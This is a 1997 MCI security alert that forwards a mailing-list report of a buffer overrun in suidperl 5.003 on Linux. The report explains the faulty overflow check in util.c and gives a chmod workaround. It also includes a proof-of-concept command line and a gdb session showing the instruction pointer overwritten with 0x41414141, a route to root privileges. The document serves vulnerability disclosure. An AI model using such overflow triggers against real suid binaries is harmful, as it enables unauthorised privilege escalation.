MCI Telecommunications internetMCI Security Group Report Title: iMCI MIIGS Security Alert Report Name: buffer overrun in sperl5.003 Report Number: iMCISE:IMCILINUX:111497:01:P1R1 Report Date: 11/14/97 Report Format: Formal Report Classification: MCI Informational Report Reference: http://www.security.mci.net Report Distribution: iMCI Security, MCI Internal Internet Gateway Security (MIIGS), MCI Emergency Alert LiSt (MEALS) (names on file) -------------------------------------------------------------------------- >From: Pavel Kankovsky To: linux-alert@redhat.com Summary: Any user can gain root privileges on a Intel Linux system with suidperl 5.003 (having the suid bit, of course) even if "SUIDBUF" and "two suidperl security patches" have been applied. Non-Intel / non-Linux platforms may be affected as well. Quick fix: chmod u-s /usr/bin/sperl5.003 (what else?) Details: There is a nasty bug in mess() (util.c): it is possible to overflow its buffer (via sprintf()); mess() tries to detect this situation but fails to handle the problem properly: [excerpt from util.c] if (s - s_start >= sizeof(buf)) { /* Ooops! */ if (usermess) fputs(SvPVX(tmpstr), stderr); else fputs(buf, stderr); fputs("panic: message overflow - memory corrupted!\n",stderr); my_exit(1); } It does not abort immediately. It prints out an error message and calls my_exit(1), and this is very bad. $ perl -v This is perl, version 5.003 with EMBED Locally applied patches: SUIDBUF - Buffer overflow fixes for suidperl security built under linux at Apr 22 1997 10:04:46 + two suidperl security patches $ perl `perl -e "print 'A' x 3000"` Can't open perl script "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... ...AAAAAAAAAAAAAAAAA": File name too long panic: message overflow - memory corrupted! $ Can't open perl script "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... ...AAAAAAAAAAAAAAAAA": File name too long panic: message overflow - memory corrupted! Segmentation fault (core dumped) $ gdb /usr/bin/perl core GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation, Inc... (no debugging symbols found)... Core was generated by `perl AAAAA...'. Program terminated with signal 11, Segmentation fault. Reading symbols ... ... #0 0x41414141 in ?? () (gdb) Voila! 0x41414141 == "AAAA" The variable called top_env has been overwritten. In fact, it is jmp_buf and Perl calls longjmp() with it somewhere in my_exit(). I have tested this on two Red Hat 4.2 systems running on Intel (with perl-5.003-8 and -9). I am pretty sure any Intel-like Linux having sperl5.003 is affected. Other platforms may be affected too. Perl 5.004 is NOT VULNERABLE. --Pavel Kankovsky aka Peak (troja.mff.cuni.cz network administration) http://www.security.mci.net ================================================================